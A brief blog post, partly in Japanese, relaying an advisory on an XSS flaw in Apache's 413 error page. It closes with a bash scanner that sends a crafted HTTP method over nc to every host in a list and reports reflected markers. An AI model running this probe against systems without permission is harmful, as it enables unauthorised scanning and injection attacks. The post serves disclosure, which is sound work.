SecuriTeam"! - Apache HTTP Server 413 Error Page XSS
Apacheの413エラー画面でクロスサイトスクリプティングする脆弱性が存在するそうです。
A vulnerability in the way Apache handles malformed requests, specifically when it answers with an error code of 413 allows remote attackers to inject arbitrary HTML and/or JavaScript into the response received from the server.
Header injection has been demonstrated to be possible using Flash [1] [2], but might be dependent on vulnerable Flash plugins. A relevant example published in the past is exploiting the Apache 'Expect' XSS [3] (CVE-2006-3918) using flash [4]. However, in this case we need to spoof the HTTP METHOD to a specially-crafted value.
PoC簡単だぁ。
#!/bin/bash # PR07-37-scan if [ $# -ne 1 ] then echo "$0 <hosts-file>" exit fi for i in `cat $1` do if echo -en "<PROCHECKUP> / HTTP/1.1\nHost: $i\nConnection: close\nContent-length: 0\nContent-length: 0\n\n" | nc -w 4 $i 80 | grep -i '<PROCHECKUP>' > /dev/null then echo "$i is VULNERABLE!" fi done